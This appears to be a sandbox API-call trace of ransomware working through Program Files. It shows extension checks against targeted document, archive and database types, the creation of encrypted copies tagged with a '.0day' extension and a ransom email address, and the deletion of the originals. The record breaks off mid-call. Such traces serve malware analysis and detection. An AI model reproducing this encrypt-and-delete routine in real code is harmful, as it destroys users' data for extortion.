[0267.360] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0267.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0267.361] lstrlenW (lpString=".jpg") returned 4 [0267.361] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0267.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0267.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0267.361] lstrlenW (lpString=".doc") returned 4 [0267.361] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0267.361] lstrlenW (lpString=".docx") returned 5 [0267.361] lstrcmpiW (lpString1=".docx", lpString2="c.jpg") returned -1 [0267.361] lstrlenW (lpString=".pdf") returned 4 [0267.361] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0267.361] lstrlenW (lpString=".xls") returned 4 [0267.361] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0267.361] lstrlenW (lpString=".xlsx") returned 5 [0267.361] lstrcmpiW (lpString1=".xlsx", lpString2="c.jpg") returned -1 [0267.361] lstrlenW (lpString=".ppt") returned 4 [0267.361] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0267.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0267.361] lstrlenW (lpString=".zip") returned 4 [0267.361] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0267.361] lstrlenW (lpString=".rar") returned 4 [0267.361] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0267.361] lstrlenW (lpString=".bz2") returned 4 [0267.361] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0267.361] lstrlenW (lpString=".7z") returned 3 [0267.361] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0267.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0267.361] lstrlenW (lpString=".dbf") returned 4 [0267.361] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0267.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0267.362] lstrlenW (lpString=".1cd") returned 4 [0267.362] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0267.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0267.362] lstrlenW (lpString=".jpg") returned 4 [0267.362] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0267.362] lstrcmpiW (lpString1=".htm", lpString2=".0day") returned 1 [0267.362] lstrlenW (lpString="Roses.htm") returned 9 [0267.362] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.363] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=233) returned 1 [0267.363] CloseHandle (hObject=0x2f8) returned 1 [0267.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm")) returned 0x20 [0267.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.363] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0267.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0267.363] lstrlenW (lpString=".doc") returned 4 [0267.363] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0267.363] lstrlenW (lpString=".docx") returned 5 [0267.363] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0267.363] lstrlenW (lpString=".pdf") returned 4 [0267.363] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0267.363] lstrlenW (lpString=".xls") returned 4 [0267.363] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0267.363] lstrlenW (lpString=".xlsx") returned 5 [0267.363] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0267.363] lstrlenW (lpString=".ppt") returned 4 [0267.363] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0267.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0267.363] lstrlenW (lpString=".zip") returned 4 [0267.363] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0267.363] lstrlenW (lpString=".rar") returned 4 [0267.363] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0267.363] lstrlenW (lpString=".bz2") returned 4 [0267.363] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0267.363] lstrlenW (lpString=".7z") returned 3 [0267.364] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0267.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0267.364] lstrlenW (lpString=".dbf") returned 4 [0267.364] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0267.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0267.364] lstrlenW (lpString=".1cd") returned 4 [0267.364] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0267.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0267.364] lstrlenW (lpString=".jpg") returned 4 [0267.364] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0267.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0267.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0267.364] lstrlenW (lpString=".doc") returned 4 [0267.364] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0267.364] lstrlenW (lpString=".docx") returned 5 [0267.364] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0267.364] lstrlenW (lpString=".pdf") returned 4 [0267.364] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0267.364] lstrlenW (lpString=".xls") returned 4 [0267.364] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0267.364] lstrlenW (lpString=".xlsx") returned 5 [0267.364] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0267.364] lstrlenW (lpString=".ppt") returned 4 [0267.364] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0267.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0267.364] lstrlenW (lpString=".zip") returned 4 [0267.364] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0267.364] lstrlenW (lpString=".rar") returned 4 [0267.364] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0267.364] lstrlenW (lpString=".bz2") returned 4 [0267.364] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0267.364] lstrlenW (lpString=".7z") returned 3 [0267.364] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0267.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0267.365] lstrlenW (lpString=".dbf") returned 4 [0267.365] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0267.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0267.365] lstrlenW (lpString=".1cd") returned 4 [0267.365] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0267.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0267.365] lstrlenW (lpString=".jpg") returned 4 [0267.365] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0267.365] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0267.365] lstrlenW (lpString="Roses.jpg") returned 9 [0267.365] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.366] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1920) returned 1 [0267.366] CloseHandle (hObject=0x2f8) returned 1 [0267.366] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg")) returned 0x20 [0267.366] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.366] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 67 [0267.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 67 [0267.366] lstrlenW (lpString=".doc") returned 4 [0267.366] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0267.366] lstrlenW (lpString=".docx") returned 5 [0267.366] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0267.366] lstrlenW (lpString=".pdf") returned 4 [0267.366] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0267.366] lstrlenW (lpString=".xls") returned 4 [0267.366] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0267.366] lstrlenW (lpString=".xlsx") returned 5 [0267.366] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0267.366] lstrlenW (lpString=".ppt") returned 4 [0267.366] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0267.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 67 [0267.366] lstrlenW (lpString=".zip") returned 4 [0267.367] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0267.367] lstrlenW (lpString=".rar") returned 4 [0267.367] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0267.367] lstrlenW (lpString=".bz2") returned 4 [0267.367] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0267.367] lstrlenW (lpString=".7z") returned 3 [0267.367] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0267.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 67 [0267.367] lstrlenW (lpString=".dbf") returned 4 [0267.367] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0267.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 67 [0267.367] lstrlenW (lpString=".1cd") returned 4 [0267.367] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0267.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 67 [0267.367] lstrlenW (lpString=".jpg") returned 4 [0267.367] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0267.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 67 [0267.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 67 [0267.367] lstrlenW (lpString=".doc") returned 4 [0267.367] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0267.368] lstrlenW (lpString=".docx") returned 5 [0267.368] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0267.368] lstrlenW (lpString=".pdf") returned 4 [0267.368] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0267.368] lstrlenW (lpString=".xls") returned 4 [0267.368] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0267.368] lstrlenW (lpString=".xlsx") returned 5 [0267.368] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0267.368] lstrlenW (lpString=".ppt") returned 4 [0267.368] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0267.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 67 [0267.368] lstrlenW (lpString=".zip") returned 4 [0267.368] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0267.368] lstrlenW (lpString=".rar") returned 4 [0267.368] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0267.368] lstrlenW (lpString=".bz2") returned 4 [0267.368] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0267.368] lstrlenW (lpString=".7z") returned 3 [0267.368] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0267.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 67 [0267.368] lstrlenW (lpString=".dbf") returned 4 [0267.368] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0267.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 67 [0267.368] lstrlenW (lpString=".1cd") returned 4 [0267.368] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0267.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 67 [0267.368] lstrlenW (lpString=".jpg") returned 4 [0267.368] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0267.368] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0267.368] lstrlenW (lpString="Sand_Paper.jpg") returned 14 [0267.369] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.369] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=15776) returned 1 [0267.369] CloseHandle (hObject=0x2f8) returned 1 [0267.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg")) returned 0x20 [0267.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.369] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72 [0267.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72 [0267.369] lstrlenW (lpString=".doc") returned 4 [0267.369] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0267.369] lstrlenW (lpString=".docx") returned 5 [0267.369] lstrcmpiW (lpString1=".docx", lpString2="r.jpg") returned -1 [0267.369] lstrlenW (lpString=".pdf") returned 4 [0267.369] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0267.369] lstrlenW (lpString=".xls") returned 4 [0267.369] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0267.369] lstrlenW (lpString=".xlsx") returned 5 [0267.369] lstrcmpiW (lpString1=".xlsx", lpString2="r.jpg") returned -1 [0267.369] lstrlenW (lpString=".ppt") returned 4 [0267.369] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0267.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72 [0267.369] lstrlenW (lpString=".zip") returned 4 [0267.369] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0267.369] lstrlenW (lpString=".rar") returned 4 [0267.370] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0267.370] lstrlenW (lpString=".bz2") returned 4 [0267.370] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0267.370] lstrlenW (lpString=".7z") returned 3 [0267.370] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0267.370] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72 [0267.370] lstrlenW (lpString=".dbf") returned 4 [0267.370] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0269.175] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.175] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0269.179] GetLastError () returned 0x0 [0269.179] ReadFile (in: hFile=0x300, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x27a2, lpOverlapped=0x0) returned 1 [0269.184] WriteFile (in: hFile=0x2cc, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x27b0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x27b0, lpOverlapped=0x0) returned 1 [0269.186] ReadFile (in: hFile=0x300, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0269.186] WriteFile (in: hFile=0x2cc, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.186] SetEndOfFile (hFile=0x2cc) returned 1 [0269.186] CloseHandle (hObject=0x2cc) returned 1 [0269.186] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.186] SetEndOfFile (hFile=0x300) returned 1 [0269.188] CloseHandle (hObject=0x300) returned 1 [0269.188] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.189] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf")) returned 1 [0269.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0269.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0269.189] lstrlenW (lpString=".doc") returned 4 [0269.189] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.189] lstrlenW (lpString=".docx") returned 5 [0269.189] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.189] lstrlenW (lpString=".pdf") returned 4 [0269.189] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.189] lstrlenW (lpString=".xls") returned 4 [0269.189] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.189] lstrlenW (lpString=".xlsx") returned 5 [0269.189] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.189] lstrlenW (lpString=".ppt") returned 4 [0269.189] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0269.189] lstrlenW (lpString=".zip") returned 4 [0269.189] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.189] lstrlenW (lpString=".rar") returned 4 [0269.189] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.189] lstrlenW (lpString=".bz2") returned 4 [0269.189] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.189] lstrlenW (lpString=".7z") returned 3 [0269.189] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0269.190] lstrlenW (lpString=".dbf") returned 4 [0269.190] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0269.190] lstrlenW (lpString=".1cd") returned 4 [0269.190] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0269.190] lstrlenW (lpString=".jpg") returned 4 [0269.190] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0269.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0269.190] lstrlenW (lpString=".doc") returned 4 [0269.190] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.190] lstrlenW (lpString=".docx") returned 5 [0269.190] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.190] lstrlenW (lpString=".pdf") returned 4 [0269.190] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.190] lstrlenW (lpString=".xls") returned 4 [0269.190] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.190] lstrlenW (lpString=".xlsx") returned 5 [0269.190] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.190] lstrlenW (lpString=".ppt") returned 4 [0269.190] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0269.190] lstrlenW (lpString=".zip") returned 4 [0269.190] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.190] lstrlenW (lpString=".rar") returned 4 [0269.190] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.190] lstrlenW (lpString=".bz2") returned 4 [0269.190] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.190] lstrlenW (lpString=".7z") returned 3 [0269.190] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0269.190] lstrlenW (lpString=".dbf") returned 4 [0269.191] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0269.191] lstrlenW (lpString=".1cd") returned 4 [0269.191] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0269.191] lstrlenW (lpString=".jpg") returned 4 [0269.191] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.191] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.191] lstrlenW (lpString="BL00130_.WMF") returned 12 [0269.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0269.192] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1464) returned 1 [0269.192] CloseHandle (hObject=0x300) returned 1 [0269.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf")) returned 0x20 [0269.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0269.193] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.193] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 